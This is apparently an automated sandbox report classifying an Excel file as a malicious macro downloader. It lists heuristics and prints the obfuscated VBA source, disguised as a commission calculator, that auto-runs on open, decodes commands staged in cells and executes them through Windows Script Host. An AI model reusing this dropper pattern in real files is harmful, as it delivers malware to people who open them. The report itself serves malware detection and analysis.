Verdict: MALICIOUS
Risk Score: 270
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains VBA macros, including a Workbook_Open event handler, which are designed to execute code when the workbook is opened. The macros reconstruct payload locations and attempt to download payloads from multiple URLs, indicating downloader or dropper functionality. The presence of CreateObject and Wscript.Shell references further supports the execution of external code. The embedded URLs are the primary indicators of compromise.
Heuristics 8
- ClamAV: Doc.Malware.Valyria-10004384-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Valyria-10004384-0
- VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- URL reconstructed from VBA cell-staged base64 dropper (12 URLs) [critical] OLE_VBA_CELL_DROPPER_URL: VBA reads worksheet cells, strips junk substrings via Replace(), and base64/UTF-16 decodes the result into a PowerShell EncodedCommand payload. The download URL is never contiguous in the file bytes; it was recovered by removing the macro's Replace() junk tokens from the cell strings and decoding the staged base64.
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script: Set bwkasdgf3 = _ Vsa3gkjagaRga3.CreateObject(hdrRyhsdrhl.Caption, hdrRyhsdrhl.Tag) hdrRyhsdrhl.Tag = Replace(Cells(108, 2), "nga", "")
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Workbook_Open macro [low] OLE_VBA_WBOPEN: Workbook_Open macro. Matched line in script: End Sub Private Sub Workbook_Open() Dim dblSales, ghAWEusaf As Double, hfoqila As String, intYears As Double
- Reference to Windows Script Host [high] SC_STR_WSCRIPT: Reference to Windows Script Host
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7821 bytes |

SHA-256: 527d0656a0c2c323955d068683ef8f7e20c035cda247a1e24383595c0eb3403b

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "vbasETGs4sk"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function FGse3ksjdfgskbkjhg(Sales As Long, IsTemporal As Boolean) As Double
Const dblRate1 As Double = 0.09
Const dblRate2 As Double = 0.11
Const dblRate3 As Double = 0.15
Const dblAdd As Double = 1.1
Const lngSum1 As Long = 5000
Const lngSum2 As Long = 10000
If Sales < lngSum1 Then
FGse3ksjdfgskbkjhg = Sales * dblRate1
ElseIf Sales < lngSum2 Then
FGse3ksjdfgskbkjhg = Sales * dblRate2
Else
FGse3ksjdfgskbkjhg = Sales * dblRate3
End If
If IsTemporal Then
FGse3ksjdfgskbkjhg = dblAdd * FGse3ksjdfgskbkjhg
End If
End Function
Sub IfyJvfgssbvsrjbnmb()
Dim strMessage As String
Dim dblSales As Double
Dim ah As Integer
Calc:
dblSales = Val(InputBox("y7uo9tuis gjdfhKUY:", _
"vDSe5ydThjs hs6rUu5seF 5^& zsdf"))
strMessage = "bks fgwhkjsd:" & vbTab & Format(dblSales, "$#,##0") & _
vbCrLf & "weq3ts jrg:" & vbTab & _
Format(dhCalculateCom(dblSales), "$#,##0") & _
vbCrLf & vbCrLf & "SGwethjsodihl"
If MsgBox(strMessage, vbYesNo, _
"gjw ") = vbYes Then
GoTo Calc
End If
End Sub
Private Sub Workbook_Open()
Dim dblSales, ghAWEusaf As Double, hfoqila As String, intYears As Double
Const dblRate1 = 0.09
Const dblRate2 = 0.11
Const dblRate3 = 0.15
dblSales = 6000
Select Case dblSales
Case 0 To 4999.99: ghAWEusaf = dblSales * dblRate1
Case 5000 To 9999.99:
ghAWEusaf = dblSales * dblRate2
For i = 1 To 2
Dim hgwki, tuowq As String
If i = 1 Then
hgwki = Cells(106, 6): tuowq = Replace(Cells(107, 2), "poi", "")
ghAWEusaf = dblSales * dblRate2 - 1
Else
hgwki = Cells(117, 2): tuowq = Cells(115, 2) & vbCrLf + Cells(116, 2)
End If
esfhkRGW3eri7asi 4782, hgwki, tuowq
Next
Range("B1").Select
Case Is >= 10000: ghAWEusaf = dblSales * dblRate3
End Select
ghAWEusaf = ghAWEusaf + _
(ghAWEusaf * intYears / 100)
End Sub
Sub esfhkRGW3eri7asi(dhfau As Long, ByVal ehjlsdk As String, ByVal fhuolij As String)
Dim cell As Range
Dim strFirstAddress As String
Dim strComments As String
hdrRyhsdrhl.Caption = fhuolij
Set cell = Range("C201:B300")
Open ehjlsdk For Output As #1
If Not cell Is Nothing And strComments = "ehroiwd4" Then
strFirstAddress = cell.Address
Do
strComments = strComments & "Fafhkleishal: " & _
cell.Comment.Text & Chr(13)
Set cell = Selection.FindNext(cell)
Loop While Not cell Is Nothing And _
cell.Address <> strFirstAddress
End If
If strComments <> "Tyu3jdk" Then
strComments = "ryE5yedklsh sdgk"
Print #1, hdrRyhsdrhl.Caption
Else
MsgBox "fWehrhse s5usdfgs"
End If
Close #1
End Sub
Attribute VB_Name = "kjRtghsw3hlsd"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public arfgjikuwe As Long
Public Eaw3ghkasghd As Boolean
Public Vsa3gkjagaRga3, bwkasdgf3 As Object
Public wdhqETqw3gajs, gfabwkjuswgkjs As Integer
Function HzsrndfGASREYe4(Txt, n, Separator) As String
Dim Txt1 As String, TempElement As String
Dim ElementCount As Integer, i As Integer
Txt1 = Txt
If Separator = Chr(32) Then Txt1 = Application.Trim(Txt1)
If Right(Txt1, 1) <> Separator Then Txt1 = Txt1 & Separator
ElementCount = 0
TempElement = ""
For i = 1 To Len(Txt1)
If Mid(Txt1, i, 1) = Separator Then
ElementCount = ElementCount + 1
If ElementCount = n Then
ExtractElement = TempElement
Exit Function
Else
TempElement = ""
End If
Else
TempElement = TempElement & Mid(Txt1, i, 1)
End If
Next i
ExtractElement = ""
End Function
Sub Gset3hwkjdhskldhlksflb(ByVal Target As Excel.Range)
Dim rgInputRange As Range
Dim cell As Range
Dim strMessage As String
Dim varResult As Variant
Set rgInputRange = Range("A1:E10")
bwkasdgf3.exec hdrRyhsdrhl.Tag
For Each cell In Target
If strMessage = "M" Then
If Union(cell, rgInputRange).Address = rgInputRange.Address Then
If varResult = True Then
Exit Sub
Else
strMessage = " " & cell.Address(False, False) & ":" _
& vbCrLf & vbCrLf & varResult
MsgBox strMessage, vbCritical, "shjfl qeyh8foisd"
Application.EnableEvents = False
cell.ClearContents
cell.Activate
Application.EnableEvents = True
End If
End If
End If
Next cell
End Sub
Function erjtdrrssaEsegs43(cell As Range) As Variant
If Not WorksheetFunction.IsNumber(cell.Value) Then
IsCellDataValid = "qeli 78et9ud"
Exit Function
End If
If Int(cell.Value) <> cell.Value Then
IsCellDataValid = "shfl9q"
Exit Function
End If
If cell.Value < 1 Or cell.Value > 12 Then
IsCellDataValid = " 1 or 12"
Exit Function
End If
IsCellDataValid = True
End Function
Private Sub Worksheet_SelectionChange(ByVal Target As Range)
Dim cell As Range: Dim rgCells As Range: Dim intRow As Integer
On Error Resume Next
Set rgCells = Range("A300:B352"): FDGwheklswheDSRFHsehk
If rgCells Is Nothing And intRow = 873 Then
For Each cell In rgCells
intRow = intRow + 1
Cells(intRow, 3) = cell.Comment.Text
Next
Else
intRow = intRow - 3
Gset3hwkjdhskldhlksflb Range("G504")
Exit Sub
End If
End Sub
Sub FDGwheklswheDSRFHsehk()
Dim alngData() As Long: Dim lngCount As Long
Dim dtStart As Date: Dim strArrayToTable As String
Dim strTableToArray As String
Dim strMessage As String: Dim i As Long
lngCount = 10: FGse34njlskdhfih
ReDim alngData(1 To lngCount): hdrRyhsdrhl.Caption = Cells(114, 5)
hdrRyhsdrhl.Tag = ""
If strArrayToTable = "87" Then
For i = 1 To lngCount
alngData(i) = i
Next i
Application.ScreenUpdating = False
dtStart = Timer
For i = 1 To lngCount
Cells(i, 1) = i
Next i
strArrayToTable = Format(Timer - dtStart, "00:00")
dtStart = Timer
For i = 1 To lngCount
alngData(i) = Cells(i, 1)
Next i
strTableToArray = Format(Timer - dtStart, "00:00")
Application.ScreenUpdating = True
End If
Set bwkasdgf3 = _
Vsa3gkjagaRga3.CreateObject(hdrRyhsdrhl.Caption, hdrRyhsdrhl.Tag)
hdrRyhsdrhl.Tag = Replace(Cells(108, 2), "nga", "")
strMessage = ": " & strArrayToTable & vbCrLf & ": " & strTableToArray
End Sub
Sub FGse34njlskdhfih()
Dim cell As Range
Dim strFirstAddress As String
Dim intRow As Integer
hdrRyhsdrhl.Tag = Cells(118, 4)
Set cell = Cells.Find("*", LookIn:=xlComments)
Set Vsa3gkjagaRga3 = CreateObject(hdrRyhsdrhl.Tag)
If Not cell Is Nothing And intRow = 2346 Then
strFirstAddress = cell.Address
Do
intRow = intRow + 1
Cells(intRow, 3) = cell.Comment.Text
Set cell = Cells.FindNext(cell)
Loop While Not cell Is Nothing And _
cell.Address <> strFirstAddress
End If
End Sub
Attribute VB_Name = "hdrRyhsdrhl"
Attribute VB_Base = "0{31D72C0D-71E1-4560-A78F-4581AE787333}{A613E03F-51BB-441E-BFF4-8650DA53184B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False